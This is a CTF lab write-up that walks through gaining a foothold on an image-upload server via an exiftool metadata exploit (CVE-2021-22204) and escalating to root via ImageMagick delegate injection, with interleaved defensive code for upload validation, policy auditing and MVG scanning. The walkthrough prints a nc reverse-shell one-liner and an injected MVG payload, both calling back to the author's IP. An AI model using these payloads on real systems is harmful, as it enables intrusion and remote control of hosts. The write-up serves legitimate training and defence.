Date: 21st / 22nd November 2021
Description
This is my writeup for the recent CTF hosted by Mystiko, which was held on TryHackMe. I had a great time participating in the CTF and found it to be very challenging and enjoyable. I would like to express my gratitude to the Mystiko team for organizing such a fantastic event and for creating such a compelling and challenging machine.
- THM Link: MystikoCTF2021
- Difficulty: Medium
Unfortunately, I did not have a lot of time to dedicate to the CTF, but I was still able to achieve a strong finish and share third place with cryptonic007.
Enumeration
The CTF had three different web apps.
Only PIXEL, DEV01 and DEV02 are in scope for this CTF. Do NOT attack any other IP address or hostname.
As a first step in identifying and analyzing the target system, it is a good idea to run nmap:
nmap -sCV 10.10.206.211 -vvv
There are two open ports on the target: 22 (SSH) and 8080 (Nginx web server).
Let’s dig into the web server.
Upon examining the web server, I found that it appears to be an image uploader. I opened the source code of the page to see if there were any hidden comments, but I did not find any. I also confirmed that the server is only accepting image files.
I uploaded an image and used Burp Suite to capture and analyze the traffic.
I attempted to manipulate the file extension and MIME type in various ways, but none of these methods seemed to have any effect. However, while reviewing the responses from the server, I noticed something interesting.
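The behaviour observed above (extension and MIME tricks having no effect) is what content-based validation looks like from the server side. The following is an added example, not the CTF's upload handler: it decides by the file's magic bytes and ignores the client-supplied filename and Content-Type, rejecting any mismatch between the three. The sample uploads are constructed here. The caveat the rest of this writeup illustrates: such a check only proves the file starts like an image; any tool that then parses the whole file (here exiftool, which reads the metadata) still sees everything after the header.

```python
# Constructed sample uploads (not from the writeup): minimal PNG and JPEG
# signatures, plus a shell script renamed to look like an image.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SCRIPT_BYTES = b"#!/bin/sh\necho hello\n"

# Leading bytes -> MIME type the server will trust, regardless of client claims.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
]
ALLOWED_EXT = {
    "image/png": {"png"},
    "image/jpeg": {"jpg", "jpeg"},
    "image/gif": {"gif"},
}


def sniff_image_type(data: bytes):
    """Return the MIME type implied by the file's leading bytes, or None."""
    for magic, mime in MAGIC:
        if data.startswith(magic):
            return mime
    return None


def validate_upload(filename: str, declared_mime: str, data: bytes):
    """Return (accepted, reason). Only the content is trusted; the filename and
    declared Content-Type must agree with it or the upload is rejected."""
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "content does not start with a known image signature"
    # Strip any ';charset=...' parameter before comparing the media type.
    declared = declared_mime.split(";")[0].strip().lower()
    if declared != sniffed:
        return False, f"declared {declared!r} but content is {sniffed}"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT[sniffed]:
        return False, f"extension {ext!r} does not match {sniffed}"
    return True, sniffed


if __name__ == "__main__":
    for name, mime, data in [
        ("cat.png", "image/png", PNG_BYTES),
        ("shell.jpg", "image/jpeg", SCRIPT_BYTES),
        ("cat.jpg", "image/png", JPEG_BYTES),
    ]:
        print(name, validate_upload(name, mime, data))
```

The script upload and the MIME/extension mismatches are rejected, the genuine PNG is accepted; a JPEG carrying hostile metadata would also be accepted, which is exactly why the metadata parser downstream matters.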
I discovered that there was a hidden HTML heading in the response that contained information about the picture I had uploaded, including the MIME type, size, and image dimensions. This heading also contained a strange value that looked like a version number, starting with 10.61!
I suspected that this heading was produced by exiftool, so I looked for recent vulnerabilities in exiftool that I could potentially exploit. I came across CVE-2021-22204, which I had not previously had the opportunity to try.
Foothold
I tried several different public exploits for the CVE in an attempt to find one that would be effective in this situation. After testing multiple options, I was finally able to identify a working exploit:
https://github.com/bilkoh/POC-CVE-2021-22204
With the working exploit in hand, I was able to use the following command line to create the malicious image:
The picture will download a file, shell.sh, from my web server and execute it.
shell.sh:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.2.95.202 9009 >/tmp/f
Let’s upload the file.
I set up a listener and then uploaded the malicious image to the server. As a result, I was able to successfully obtain a reverse shell.
Getting the first flag, local.txt, was pretty easy: it was in the home directory of our current user, pixel, and I was able to read it without any restrictions.
Privilege Escalation
As a best practice, one of the first things I usually do after obtaining a reverse shell is to run the sudo -l command to check whether there are any commands that I can execute using sudo.
Perfect! We have a binary called pixel. I copied this binary to my own machine in order to perform some reverse engineering and analysis.
I had a look at it in Ghidra, but I won’t say much: nothing was interesting.
I ran the binary on my own machine to perform some dynamic analysis.
The binary appears to be an image toolkit created by the SIXER team. As part of my analysis, I chose to use the tool to convert an image to a PDF file and see what would happen.
The Generating PDF line shows us that the binary uses the /usr/local/bin/convert tool to convert the image to a PDF. I had recently worked with a 2016 exploit involving convert, so I quickly returned to the Pixel machine to check the version of convert that was being used.
I was pleased to discover that the version of convert being used on the Pixel machine was indeed vulnerable to the exploit. By searching for ImageMagick exploit online, I was able to find a number of articles and resources that provided more information about this vulnerability and demonstrated various methods for exploiting it.
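The defender's side of this finding is ImageMagick's policy.xml: after the 2016 delegate-injection bug (commonly called ImageTragick), the published mitigation was to deny the EPHEMERAL, URL, HTTPS, MVG and MSL coders and the "@*" path pattern, which is what makes convert refuse MVG input of the kind used in this writeup. The following audit script is an added example, not part of the writeup or of ImageMagick; the two policy files it checks are constructed here, one resembling an unhardened install and one carrying the mitigation entries.

```python
import xml.etree.ElementTree as ET

# Coders that the public ImageTragick mitigation advice denies outright. Each
# one lets crafted MVG/MSL input reach external resources or the delegate
# (shell) layer that an injected url(...) argument abuses.
REQUIRED_CODER_DENY = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}
# Path pattern from the same advice: blocks '@file' indirect reads.
REQUIRED_PATH_DENY = {"@*"}

# Constructed sample policies (not taken from any real host).
PERMISSIVE_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>"""


def parse_denied(xml_text: str):
    """Collect the coder and path patterns that policy.xml sets to rights="none"."""
    root = ET.fromstring(xml_text)
    denied_coders, denied_paths = set(), set()
    for pol in root.iter("policy"):
        if pol.get("rights", "").strip().lower() != "none":
            continue
        pattern = pol.get("pattern", "")
        if pol.get("domain") == "coder":
            denied_coders.add(pattern.upper())
        elif pol.get("domain") == "path":
            denied_paths.add(pattern)
    return denied_coders, denied_paths


def audit_policy(xml_text: str):
    """Return a list of human-readable findings; empty means every expected
    denial is present."""
    coders, paths = parse_denied(xml_text)
    findings = []
    for coder in sorted(REQUIRED_CODER_DENY - coders):
        findings.append(f"coder {coder} is not denied")
    for path in sorted(REQUIRED_PATH_DENY - paths):
        findings.append(f"path pattern {path} is not denied")
    return findings


if __name__ == "__main__":
    for label, text in [("permissive", PERMISSIVE_POLICY), ("hardened", HARDENED_POLICY)]:
        print(label, audit_policy(text) or "OK")
```

On a real host, point it at the policy.xml that `convert -list policy` reports (the path varies by packaging), and treat the audit as a configuration check only: denying the coders narrows the attack surface, it does not replace upgrading the vulnerable convert binary.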
I followed these steps to exploit it:
1) Go to the /tmp/ directory.
2) Create a new file exploit.mvg:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|nc -e "/bin/sh" "10.2.95.202" "9009)'
pop graphic-context
3) Set my listener on port 9009:
nc -lvnp 9009
4) Run sudo /usr/bin/pixel and follow the steps as the image shows (instead of x.jpg, enter exploit.mvg).
5) Go back to my listener to check if I got a reverse shell:
And yes! I gained root access to the system and was able to read the second flag, proof.txt.
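The exploit.mvg above works because the argument of `url()` reaches ImageMagick's delegate layer, which hands it to a shell, so a closing quote followed by `|` turns a fetch into a command. As an added example (not part of the writeup), here is a scanner a service could run over MVG/SVG-style text before ever handing it to convert; it flags shell metacharacters inside `url()`, the ephemeral:/msl: schemes and `label:@`-style file reads, and separately reports plain remote URLs. The two sample files are constructed, the second shaped like exploit.mvg but with a harmless command in place of the original payload.

```python
import re

# Constructed samples (not the writeup's files): a benign MVG that only
# references a remote image, and one with an injected command.
BENIGN_MVG = """push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg)'
pop graphic-context
"""

MALICIOUS_MVG = """push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|id > /tmp/marker)'
pop graphic-context
"""

# Greedy so a url(...) argument that itself contains ')' is captured whole.
URL_ARG = re.compile(r"url\((.*)\)", re.I)
# Characters that never belong in a URL/path argument and that the delegate
# layer would interpret.
SHELL_META = re.compile(r'["`|;&$<>]')
REMOTE = re.compile(r"^(https?|ftp)://", re.I)
# Schemes and prefixes that reach other ImageTragick-era code paths.
RISKY_SCHEME = re.compile(r"\b(ephemeral|msl):", re.I)
FILE_REF = re.compile(r"\b(label|text|caption):@", re.I)


def scan_vector_text(text: str):
    """Return [(line_no, rule, snippet)] for an MVG/SVG body."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in URL_ARG.finditer(line):
            arg = m.group(1).strip("'\" ")
            if SHELL_META.search(arg):
                findings.append((no, "shell-metachars-in-url", arg))
            elif REMOTE.match(arg):
                findings.append((no, "remote-url", arg))
        if RISKY_SCHEME.search(line):
            findings.append((no, "risky-coder-scheme", line.strip()))
        if FILE_REF.search(line):
            findings.append((no, "local-file-read", line.strip()))
    return findings


def should_reject(text: str) -> bool:
    """Reject on anything except a plain remote URL, which is left to policy
    (it is an SSRF concern rather than code execution)."""
    return any(rule != "remote-url" for _, rule, _ in scan_vector_text(text))


if __name__ == "__main__":
    for label, body in [("benign", BENIGN_MVG), ("malicious", MALICIOUS_MVG)]:
        print(label, should_reject(body), scan_vector_text(body))
```

This is a content check, not a parser: it is meant to sit in front of a hardened policy.xml and a patched convert, not to stand in for them, and it only looks at text-based vector input, so it says nothing about the JPEG-with-metadata path used earlier in the writeup.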